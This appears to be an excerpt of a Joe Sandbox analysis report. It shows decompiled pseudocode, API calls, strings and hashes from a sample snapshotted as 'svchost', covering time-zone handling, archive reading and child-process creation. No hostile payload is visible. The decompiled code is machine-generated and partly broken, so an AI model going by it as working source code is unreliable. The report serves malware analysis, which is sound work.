                            • Opcode Fuzzy Hash: a5581c4fc5a05038f0aae765913ea1366c143109ed0ddfe926e77de34cf14487
                            • Instruction Fuzzy Hash: BDA10532A14145DFCF19DF68DC92FADBBE1EB06320F15019EE815AB392EB718912CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E00BDAFBE(void* __eflags, signed int _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				int _v16;
                            				int _v20;
                            				int _v24;
                            				char _v52;
                            				int _v56;
                            				int _v60;
                            				signed int _v100;
                            				char _v272;
                            				intOrPtr _v276;
                            				char _v280;
                            				char _v356;
                            				char _v360;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t65;
                            				signed int _t72;
                            				signed int _t74;
                            				signed int _t78;
                            				void* _t80;
                            				signed int _t84;
                            				signed int _t88;
                            				signed int _t90;
                            				long _t92;
                            				signed int* _t95;
                            				signed int _t98;
                            				signed int _t101;
                            				signed int _t105;
                            				void* _t112;
                            				signed int _t115;
                            				void* _t116;
                            				void* _t118;
                            				void* _t119;
                            				void* _t121;
                            				signed int _t123;
                            				signed int _t124;
                            				signed int _t127;
                            				void* _t130;
                            				void* _t132;
                            				signed int _t133;
                            				signed int _t135;
                            				void* _t141;
                            				intOrPtr _t142;
                            				void* _t144;
                            				signed int _t151;
                            				signed int _t152;
                            				signed int _t155;
                            				signed int _t159;
                            				signed int _t162;
                            				intOrPtr* _t167;
                            				intOrPtr _t168;
                            				signed int _t169;
                            				intOrPtr* _t170;
                            				void* _t171;
                            				void* _t172;
                            				signed int _t173;
                            				int _t177;
                            				signed int _t179;
                            				char** _t180;
                            				signed int _t184;
                            				signed int _t186;
                            				void* _t195;
                            				signed int _t196;
                            				void* _t197;
                            				signed int _t198;
                            
                            				_push(_t179);
                            				_t65 = E00BDABFC();
                            				_v8 = _v8 & 0x00000000;
                            				_t135 = _t65;
                            				_v16 = _v16 & 0x00000000;
                            				_v12 = _t135;
                            				if(E00BDAC5A( &_v8) != 0 || E00BDAC02( &_v16) != 0) {
                            					L46:
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					E00BD1798();
                            					asm("int3");
                            					_t195 = _t197;
                            					_t198 = _t197 - 0x10;
                            					_push(_t135);
                            					_t180 = E00BDABFC();
                            					_v52 = 0;
                            					_v56 = 0;
                            					_v60 = 0;
                            					_t72 = E00BDAC5A( &_v52);
                            					_t144 = _t179;
                            					__eflags = _t72;
                            					if(_t72 != 0) {
                            						L66:
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						E00BD1798();
                            						asm("int3");
                            						_push(_t195);
                            						_t196 = _t198;
                            						_t74 =  *0xbec008; // 0xdc55bb75
                            						_v100 = _t74 ^ _t196;
                            						 *0xbec91c =  *0xbec91c | 0xffffffff;
                            						 *0xbec910 =  *0xbec910 | 0xffffffff;
                            						_push(0);
                            						_push(_t180);
                            						_push(_t172);
                            						_t137 = "TZ";
                            						_t173 = 0;
                            						 *0xbf6578 = 0;
                            						_t78 = E00BD6CC0("TZ", _t168, 0, _t180, __eflags,  &_v360,  &_v356, 0x100, "TZ");
                            						__eflags = _t78;
                            						if(_t78 != 0) {
                            							__eflags = _t78 - 0x22;
                            							if(_t78 == 0x22) {
                            								_t186 = E00BD0A25(_t144, _v276);
                            								__eflags = _t186;
                            								if(__eflags != 0) {
                            									_t84 = E00BD6CC0(_t137, _t168, 0, _t186, __eflags,  &_v280, _t186, _v276, _t137);
                            									__eflags = _t84;
                            									if(_t84 == 0) {
                            										E00BD09EB(0);
                            										_t173 = _t186;
                            									} else {
                            										_push(_t186);
                            										goto L72;
                            									}
                            								} else {
                            									_push(0);
                            									L72:
                            									E00BD09EB();
                            								}
                            							}
                            						} else {
                            							_t173 =  &_v272;
                            						}
                            						asm("sbb esi, esi");
                            						_t184 =  ~(_t173 -  &_v272) & _t173;
                            						__eflags = _t173;
                            						if(_t173 == 0) {
                            							L80:
                            							L47(); // executed
                            						} else {
                            							__eflags =  *_t173;
                            							if(__eflags == 0) {
                            								goto L80;
                            							} else {
                            								_push(_t173);
                            								E00BDAFBE(__eflags);
                            							}
                            						}
                            						_t80 = E00BD09EB(_t184);
                            						__eflags = _v16 ^ _t196;
                            						E00BC786A();
                            						return _t80;
                            					} else {
                            						_t88 = E00BDAC02( &_v16);
                            						_pop(_t144);
                            						__eflags = _t88;
                            						if(_t88 != 0) {
                            							goto L66;
                            						} else {
                            							_t90 = E00BDAC2E( &_v20);
                            							_pop(_t144);
                            							__eflags = _t90;
                            							if(_t90 != 0) {
                            								goto L66;
                            							} else {
                            								E00BD09EB( *0xbf6574);
                            								 *0xbf6574 = 0;
                            								 *_t198 = 0xbf6580; // executed
                            								_t92 = GetTimeZoneInformation(??); // executed
                            								__eflags = _t92 - 0xffffffff;
                            								if(_t92 != 0xffffffff) {
                            									_t151 =  *0xbf6580 * 0x3c;
                            									_t169 =  *0xbf65d4; // 0x0
                            									_push(_t172);
                            									 *0xbf6578 = 1;
                            									_v12 = _t151;
                            									__eflags =  *0xbf65c6; // 0xb
                            									if(__eflags != 0) {
                            										_t152 = _t151 + _t169 * 0x3c;
                            										__eflags = _t152;
                            										_v12 = _t152;
                            									}
                            									__eflags =  *0xbf661a; // 0x3
                            									if(__eflags == 0) {
                            										L56:
                            										_v16 = 0;
                            										_v20 = 0;
                            									} else {
                            										_t105 =  *0xbf6628; // 0xffffffc4
                            										__eflags = _t105;
                            										if(_t105 == 0) {
                            											goto L56;
                            										} else {
                            											_v16 = 1;
                            											_v20 = (_t105 - _t169) * 0x3c;
                            										}
                            									}
                            									_t177 = E00BD7D59(0, _t169);
                            									_t98 = WideCharToMultiByte(_t177, 0, "Pacific Standard Time", 0xffffffff,  *_t180, 0x3f, 0,  &_v24);
                            									__eflags = _t98;
                            									if(_t98 == 0) {
                            										L60:
                            										 *( *_t180) = 0;
                            									} else {
                            										__eflags = _v24;
                            										if(_v24 != 0) {
                            											goto L60;
                            										} else {
                            											( *_t180)[0x3f] = 0;
                            										}
                            									}
                            									_t101 = WideCharToMultiByte(_t177, 0, "Pacific Daylight Time", 0xffffffff, _t180[1], 0x3f, 0,  &_v24);
                            									__eflags = _t101;
                            									if(_t101 == 0) {
                            										L64:
                            										 *(_t180[1]) = 0;
                            									} else {
                            										__eflags = _v24;
                            										if(_v24 != 0) {
                            											goto L64;
                            										} else {
                            											_t180[1][0x3f] = 0;
                            										}
                            									}
                            								}
                            								 *(E00BDABF6()) = _v12;
                            								 *((intOrPtr*)(E00BDABEA())) = _v16;
                            								_t95 = E00BDABF0();
                            								 *_t95 = _v20;
                            								return _t95;
                            							}
                            						}
                            					}
                            				} else {
                            					_t170 =  *0xbf6574; // 0x0
                            					_t179 = _a4;
                            					if(_t170 == 0) {
                            						L12:
                            						E00BD09EB(_t170);
                            						_t155 = _t179;
                            						_t12 = _t155 + 1; // 0xbdb3af
                            						_t171 = _t12;
                            						do {
                            							_t112 =  *_t155;
                            							_t155 = _t155 + 1;
                            						} while (_t112 != 0);
                            						_t13 = _t155 - _t171 + 1; // 0xbdb3b0
                            						 *0xbf6574 = E00BD0A25(_t155 - _t171, _t13);
                            						_t115 = E00BD09EB(0);
                            						_t168 =  *0xbf6574; // 0x0
                            						if(_t168 == 0) {
                            							goto L45;
                            						} else {
                            							_t159 = _t179;
                            							_push(_t172);
                            							_t14 = _t159 + 1; // 0xbdb3af
                            							_t172 = _t14;
                            							do {
                            								_t116 =  *_t159;
                            								_t159 = _t159 + 1;
                            							} while (_t116 != 0);
                            							_t15 = _t159 - _t172 + 1; // 0xbdb3b0
                            							_t118 = E00BD0A73(_t168, _t15, _t179);
                            							_t197 = _t197 + 0xc;
                            							if(_t118 != 0) {
                            								goto L46;
                            							} else {
                            								_t172 = 3;
                            								_push(_t172);
                            								_t119 = E00BD50A9(_t160,  *_t135, 0x40, _t179);
                            								_t197 = _t197 + 0x10;
                            								if(_t119 != 0) {
                            									goto L46;
                            								} else {
                            									while( *_t179 != 0) {
                            										_t179 = _t179 + 1;
                            										_t172 = _t172 - 1;
                            										if(_t172 != 0) {
                            											continue;
                            										}
                            										break;
                            									}
                            									_pop(_t172);
                            									_t135 = _t135 & 0xffffff00 |  *_t179 == 0x0000002d;
                            									if(_t135 != 0) {
                            										_t179 = _t179 + 1;
                            									}
                            									_t162 = E00BD1594(_t160, _t179) * 0xe10;
                            									_v8 = _t162;
                            									while(1) {
                            										_t121 =  *_t179;
                            										if(_t121 != 0x2b && (_t121 < 0x30 || _t121 > 0x39)) {
                            											break;
                            										}
                            										_t179 = _t179 + 1;
                            									}
                            									__eflags =  *_t179 - 0x3a;
                            									if( *_t179 == 0x3a) {
                            										_t179 = _t179 + 1;
                            										_t162 = _v8 + E00BD1594(_t162, _t179) * 0x3c;
                            										_v8 = _t162;
                            										while(1) {
                            											_t130 =  *_t179;
                            											__eflags = _t130 - 0x30;
                            											if(_t130 < 0x30) {
                            												break;
                            											}
                            											__eflags = _t130 - 0x39;
                            											if(_t130 <= 0x39) {
                            												_t179 = _t179 + 1;
                            												__eflags = _t179;
                            												continue;
                            											}
                            											break;
                            										}
                            										__eflags =  *_t179 - 0x3a;
                            										if( *_t179 == 0x3a) {
                            											_t179 = _t179 + 1;
                            											_t162 = _v8 + E00BD1594(_t162, _t179);
                            											_v8 = _t162;
                            											while(1) {
                            												_t132 =  *_t179;
                            												__eflags = _t132 - 0x30;
                            												if(_t132 < 0x30) {
                            													goto L38;
                            												}
                            												__eflags = _t132 - 0x39;
                            												if(_t132 <= 0x39) {
                            													_t179 = _t179 + 1;
                            													__eflags = _t179;
                            													continue;
                            												}
                            												goto L38;
                            											}
                            										}
                            									}
                            									L38:
                            									__eflags = _t135;
                            									if(_t135 != 0) {
                            										_v8 = _t162;
                            									}
                            									__eflags =  *_t179;
                            									_t123 = 0 |  *_t179 != 0x00000000;
                            									_v16 = _t123;
                            									__eflags = _t123;
                            									_t124 = _v12;
                            									if(_t123 == 0) {
                            										_t29 = _t124 + 4; // 0xfffffddd
                            										 *((char*)( *_t29)) = 0;
                            										goto L44;
                            									} else {
                            										_push(3);
                            										_t28 = _t124 + 4; // 0xfffffddd
                            										_t127 = E00BD50A9(_t162,  *_t28, 0x40, _t179);
                            										_t197 = _t197 + 0x10;
                            										__eflags = _t127;
                            										if(_t127 == 0) {
                            											L44:
                            											 *(E00BDABF6()) = _v8;
                            											_t115 = E00BDABEA();
                            											 *_t115 = _v16;
                            											goto L45;
                            										} else {
                            											goto L46;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					} else {
                            						_t167 = _t170;
                            						_t133 = _t179;
                            						while(1) {
                            							_t141 =  *_t133;
                            							if(_t141 !=  *_t167) {
                            								break;
                            							}
                            							if(_t141 == 0) {
                            								L8:
                            								_t115 = 0;
                            							} else {
                            								_t9 = _t133 + 1; // 0xdde805eb
                            								_t142 =  *_t9;
                            								if(_t142 !=  *((intOrPtr*)(_t167 + 1))) {
                            									break;
                            								} else {
                            									_t133 = _t133 + 2;
                            									_t167 = _t167 + 2;
                            									if(_t142 != 0) {
                            										continue;
                            									} else {
                            										goto L8;
                            									}
                            								}
                            							}
                            							L10:
                            							if(_t115 == 0) {
                            								L45:
                            								return _t115;
                            							} else {
                            								_t135 = _v12;
                            								goto L12;
                            							}
                            							goto L82;
                            						}
                            						asm("sbb eax, eax");
                            						_t115 = _t133 | 0x00000001;
                            						__eflags = _t115;
                            						goto L10;
                            					}
                            				}
                            				L82:
                            			}

                            APIs
                            • _free.LIBCMT ref: 00BDB040
                            • _free.LIBCMT ref: 00BDB064
                            • _free.LIBCMT ref: 00BDB1EB
                            • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            • _free.LIBCMT ref: 00BDB3B7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 314583886-1154798116
                            • Opcode ID: bd40790ce95cf15aba968211b4bcffbbbb99c74a48d51a3cdf70c41147a69ab7
                            • Instruction ID: 101df5595170c555dca53a3128017a6c3a75d5103b1b8f59af01a1da50abf2ba
                            • Opcode Fuzzy Hash: bd40790ce95cf15aba968211b4bcffbbbb99c74a48d51a3cdf70c41147a69ab7
                            • Instruction Fuzzy Hash: 34C1E172900249EBDB249F688891EAEFBE9EF55350F1541EBE894A7352FB308E41C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 55%
                            			E00BC1220(void* __ecx, void* __edx) {
                            				void* __ebp;
                            				intOrPtr _t10;
                            				void* _t12;
                            				intOrPtr _t13;
                            				void* _t14;
                            				intOrPtr _t15;
                            				intOrPtr _t32;
                            				void* _t37;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				intOrPtr _t41;
                            				intOrPtr _t44;
                            				void* _t49;
                            				void* _t51;
                            				void* _t52;
                            
                            				_t38 = __edx;
                            				_t37 = __ecx;
                            				_t39 =  *((intOrPtr*)(_t49 + 8));
                            				if( *_t39 != 0) {
                            					L3:
                            					_t44 =  *((intOrPtr*)(_t49 + 0x14));
                            					_push(0);
                            					L00BC7864();
                            					_t12 = E00BC9F16(_t38,  *_t39, _t10 +  *((intOrPtr*)(_t39 + 4)),  *((intOrPtr*)(_t44 + 4))); // executed
                            					_push( *((intOrPtr*)(_t44 + 8)));
                            					L00BC7864();
                            					_push(_t12); // executed
                            					_t13 = E00BC9808(_t37); // executed
                            					_t32 = _t13;
                            					_t51 = _t49 + 0x10;
                            					__eflags = _t32;
                            					if(__eflags != 0) {
                            						_push( *_t39);
                            						L00BC7864();
                            						_t14 = E00BC9B2B(_t32, _t13,  *((intOrPtr*)(_t44 + 8)), 1); // executed
                            						_t52 = _t51 + 0x10;
                            						__eflags = _t14 - 1;
                            						if(__eflags >= 0) {
                            							__eflags =  *((char*)(_t44 + 0x10)) - 1;
                            							if(__eflags != 0) {
                            								L10:
                            								_t15 =  *_t39;
                            								__eflags = _t15;
                            								if(__eflags != 0) {
                            									_push(_t15); // executed
                            									E00BC9889(_t37, _t38, __eflags); // executed
                            									 *_t39 = 0;
                            								}
                            								return _t32;
                            							} else {
                            								_push(_t44);
                            								_t41 = E00BC1030(_t14, _t37, __eflags, _t32); // executed
                            								L00BC9803(_t32); // executed
                            								_t52 = _t52 + 0xc;
                            								_t32 = _t41;
                            								__eflags = _t41;
                            								if(__eflags != 0) {
                            									goto L10;
                            								} else {
                            									E00BC1980(__eflags, "Error decompressing %s\n", _t44 + 0x12);
                            									__eflags = 0;
                            									return 0;
                            								}
                            							}
                            						} else {
                            							_push("Could not read from file\n");
                            							E00BC1980(__eflags);
                            							L00BC9803(_t32);
                            							__eflags = 0;
                            							return 0;
                            						}
                            					} else {
                            						_push("Could not allocate read buffer\n");
                            						E00BC1980(__eflags);
                            						__eflags = 0;
                            						return 0;
                            					}
                            				} else {
                            					_t10 = E00BC28C0(_t39 + 0x68, "rb");
                            					_t49 = _t49 + 8;
                            					 *_t39 = _t10;
                            					_t59 = _t10;
                            					if(_t10 != 0) {
                            						goto L3;
                            					} else {
                            						_push("Cannot open archive file\n");
                            						E00BC1980(_t59);
                            						return 0;
                            					}
                            				}
                            			}

                            APIs
                            Strings
                            • Could not allocate read buffer, xrefs: 00BC1287
                            • Cannot open archive file, xrefs: 00BC1241
                            • Error decompressing %s, xrefs: 00BC12F2
                            • Could not read from file, xrefs: 00BC12B5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Cannot open archive file$Could not allocate read buffer$Could not read from file$Error decompressing %s
                            • API String ID: 3757756281-3387914768
                            • Opcode ID: 0a1ae102b5dc8fd20d7c54bdcf57ce6a9c195acfd7983c4d0a0c6dbaa97a9e59
                            • Instruction ID: 2bc9e8a908702293df9303059d4bd4932d1db51ea6edca98a05496920bb14261
                            • Opcode Fuzzy Hash: 0a1ae102b5dc8fd20d7c54bdcf57ce6a9c195acfd7983c4d0a0c6dbaa97a9e59
                            • Instruction Fuzzy Hash: 43210BB2A042057AFB007A79BC46F5EB7CCEF52354F5409F9F904E1203FBA2D9508661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 73%
                            			E00BDB193(void* __eflags) {
                            				int _v8;
                            				int _v12;
                            				int _v16;
                            				int _v20;
                            				signed int _v56;
                            				char _v268;
                            				intOrPtr _v272;
                            				char _v276;
                            				char _v312;
                            				char _v316;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				void* _t36;
                            				signed int _t38;
                            				signed int _t42;
                            				void* _t45;
                            				signed int _t49;
                            				void* _t53;
                            				void* _t55;
                            				long _t57;
                            				signed int* _t60;
                            				intOrPtr _t70;
                            				void* _t79;
                            				signed int _t86;
                            				void* _t88;
                            				signed int _t89;
                            				signed int _t91;
                            				int _t95;
                            				void* _t97;
                            				char** _t98;
                            				signed int _t102;
                            				signed int _t104;
                            				signed int _t110;
                            				signed int _t111;
                            				intOrPtr _t120;
                            				intOrPtr _t122;
                            
                            				_t98 = E00BDABFC();
                            				_v8 = 0;
                            				_v12 = 0;
                            				_v16 = 0;
                            				_t36 = E00BDAC5A( &_v8);
                            				_t79 = _t97;
                            				if(_t36 != 0) {
                            					L19:
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					E00BD1798();
                            					asm("int3");
                            					_t110 = _t111;
                            					_t38 =  *0xbec008; // 0xdc55bb75
                            					_v56 = _t38 ^ _t110;
                            					 *0xbec91c =  *0xbec91c | 0xffffffff;
                            					 *0xbec910 =  *0xbec910 | 0xffffffff;
                            					_push(0);
                            					_push(_t98);
                            					_t76 = "TZ";
                            					_t91 = 0;
                            					 *0xbf6578 = 0;
                            					_t42 = E00BD6CC0("TZ", _t88, 0, _t98, __eflags,  &_v316,  &_v312, 0x100, "TZ");
                            					__eflags = _t42;
                            					if(_t42 != 0) {
                            						__eflags = _t42 - 0x22;
                            						if(_t42 == 0x22) {
                            							_t104 = E00BD0A25(_t79, _v272);
                            							__eflags = _t104;
                            							if(__eflags != 0) {
                            								_t49 = E00BD6CC0(_t76, _t88, 0, _t104, __eflags,  &_v276, _t104, _v272, _t76);
                            								__eflags = _t49;
                            								if(_t49 == 0) {
                            									E00BD09EB(0);
                            									_t91 = _t104;
                            								} else {
                            									_push(_t104);
                            									goto L25;
                            								}
                            							} else {
                            								_push(0);
                            								L25:
                            								E00BD09EB();
                            							}
                            						}
                            					} else {
                            						_t91 =  &_v268;
                            					}
                            					asm("sbb esi, esi");
                            					_t102 =  ~(_t91 -  &_v268) & _t91;
                            					__eflags = _t91;
                            					if(__eflags == 0) {
                            						L33:
                            						E00BDB193(__eflags); // executed
                            					} else {
                            						__eflags =  *_t91;
                            						if(__eflags == 0) {
                            							goto L33;
                            						} else {
                            							_push(_t91);
                            							E00BDAFBE(__eflags);
                            						}
                            					}
                            					_t45 = E00BD09EB(_t102);
                            					__eflags = _v12 ^ _t110;
                            					E00BC786A();
                            					return _t45;
                            				} else {
                            					_t53 = E00BDAC02( &_v12);
                            					_pop(_t79);
                            					if(_t53 != 0) {
                            						goto L19;
                            					} else {
                            						_t55 = E00BDAC2E( &_v16);
                            						_pop(_t79);
                            						if(_t55 != 0) {
                            							goto L19;
                            						} else {
                            							E00BD09EB( *0xbf6574);
                            							 *0xbf6574 = 0;
                            							 *_t111 = 0xbf6580; // executed
                            							_t57 = GetTimeZoneInformation(??); // executed
                            							if(_t57 != 0xffffffff) {
                            								_t86 =  *0xbf6580 * 0x3c;
                            								_t89 =  *0xbf65d4; // 0x0
                            								_push(_t90);
                            								 *0xbf6578 = 1;
                            								_v8 = _t86;
                            								_t120 =  *0xbf65c6; // 0xb
                            								if(_t120 != 0) {
                            									_v8 = _t86 + _t89 * 0x3c;
                            								}
                            								_t122 =  *0xbf661a; // 0x3
                            								if(_t122 == 0) {
                            									L9:
                            									_v12 = 0;
                            									_v16 = 0;
                            								} else {
                            									_t70 =  *0xbf6628; // 0xffffffc4
                            									if(_t70 == 0) {
                            										goto L9;
                            									} else {
                            										_v12 = 1;
                            										_v16 = (_t70 - _t89) * 0x3c;
                            									}
                            								}
                            								_t95 = E00BD7D59(0, _t89);
                            								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff,  *_t98, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                            									 *( *_t98) = 0;
                            								} else {
                            									( *_t98)[0x3f] = 0;
                            								}
                            								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff, _t98[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                            									 *(_t98[1]) = 0;
                            								} else {
                            									_t98[1][0x3f] = 0;
                            								}
                            							}
                            							 *(E00BDABF6()) = _v8;
                            							 *(E00BDABEA()) = _v12;
                            							_t60 = E00BDABF0();
                            							 *_t60 = _v16;
                            							return _t60;
                            						}
                            					}
                            				}
                            			}

                            APIs
                            • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            • _free.LIBCMT ref: 00BDB1EB
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BDB3B7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 1286116820-1154798116
                            • Opcode ID: 0ea933617849e261a536a877f11e6cfa0dfa77238e20c2a10436daed2b9c9d4a
                            • Instruction ID: 66f892b77dee4397ea6433c1b2d4c7b942ce8ce43d0fadee5be88eb5d94a353e
                            • Opcode Fuzzy Hash: 0ea933617849e261a536a877f11e6cfa0dfa77238e20c2a10436daed2b9c9d4a
                            • Instruction Fuzzy Hash: C251A572900209EBCB10DF659C81DBEFBF8EB51360B1102EBE914A7391FB308E418B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 62%
                            			E00BC4400(void* __edx, void* __ebp, void* __eflags, struct _SECURITY_ATTRIBUTES _a4, struct _SECURITY_ATTRIBUTES* _a8, int _a12, struct _PROCESS_INFORMATION _a16, struct _STARTUPINFOW _a32, struct _SECURITY_ATTRIBUTES* _a36, struct _SECURITY_ATTRIBUTES* _a40, struct _SECURITY_ATTRIBUTES* _a44, intOrPtr _a76, short _a80, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, short _a100, signed int _a8292, intOrPtr _a8300) {
                            				struct _SECURITY_ATTRIBUTES* _v0;
                            				signed int _t26;
                            				intOrPtr _t45;
                            				int _t51;
                            				signed int _t53;
                            				signed int _t64;
                            				DWORD* _t66;
                            				void* _t70;
                            
                            				_t70 = __eflags;
                            				_t62 = __edx;
                            				E00BC7880();
                            				_t26 =  *0xbec008; // 0xdc55bb75
                            				_a8292 = _t26 ^ _t64;
                            				_v0 = 0;
                            				E00BC4BF0( &_a100, _a8300, 0x1000);
                            				_push(1);
                            				_push(0x16);
                            				E00BCEDBE(__edx, _t70);
                            				_push(1);
                            				_push(2); // executed
                            				E00BCEDBE(__edx, _t70); // executed
                            				_push(1);
                            				_push(0xf);
                            				E00BCEDBE(__edx, _t70);
                            				_push(1);
                            				_push(0x15);
                            				E00BCEDBE(_t62, _t70);
                            				_a4.nLength = 0xc;
                            				_a8 = 0;
                            				_a12 = 1;
                            				GetStartupInfoW( &_a32);
                            				_a36 = 0;
                            				_a40 = 0;
                            				_a44 = 0;
                            				_a76 = 0x101;
                            				_a80 = 1;
                            				_a88 = E00BCE926(E00BD09C5(E00BCA7EB(0)));
                            				_a92 = E00BCE926(E00BD09C5(E00BCA7EB(1)));
                            				_t45 = E00BCE926(E00BD09C5(E00BCA7EB(2)));
                            				_t66 = _t64 + 0x50;
                            				_a96 = _t45;
                            				_t51 = CreateProcessW( &_a100, GetCommandLineW(),  &_a4, 0, 1, 0, 0, 0,  &_a32,  &_a16); // executed
                            				if(_t51 == 0) {
                            					_push("Error creating child process!\n");
                            					_push("CreateProcessW");
                            					_t53 = E00BC1860(_t62, __eflags) | 0xffffffff;
                            					__eflags = _t53;
                            					E00BC786A();
                            					return _t53;
                            				} else {
                            					WaitForSingleObject(_a16.hProcess, 0xffffffff);
                            					GetExitCodeProcess(_a16, _t66); // executed
                            					E00BC786A();
                            					return _v0;
                            				}
                            			}












                            APIs
                              • Part of subcall function 00BC4BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                              • Part of subcall function 00BCEDBE: SetConsoleCtrlHandler.KERNELBASE(00BCEA12,00000001,00BEA620,00000018,00BC4440,00000016,00000001,?,?,00001000,00BC26B4,?,00000000), ref: 00BCEED7
                              • Part of subcall function 00BCEDBE: GetLastError.KERNEL32 ref: 00BCEEF1
                            • GetStartupInfoW.KERNEL32(?), ref: 00BC447B
                            • GetCommandLineW.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 00BC450C
                            • CreateProcessW.KERNELBASE ref: 00BC451B
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BC452B
                            • GetExitCodeProcess.KERNELBASE ref: 00BC4539
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Process$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
                            • String ID: CreateProcessW$Error creating child process!
                            • API String ID: 1248179626-3524285272
                            • Opcode ID: b707c46ab429ee1e5b620c741458b37b65c006ae1a8b4ed0b4569e83989d17fb
                            • Instruction ID: 993076f19481b37966b6aafcfaa4756ef9fd061b5ded57d43612289ce40baf16
                            • Opcode Fuzzy Hash: b707c46ab429ee1e5b620c741458b37b65c006ae1a8b4ed0b4569e83989d17fb
                            • Instruction Fuzzy Hash: 3E3150B0954344ABEB20BB60CC4EF8B76E8AF44704F00495DB695AB2D2EBB9D544CB53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
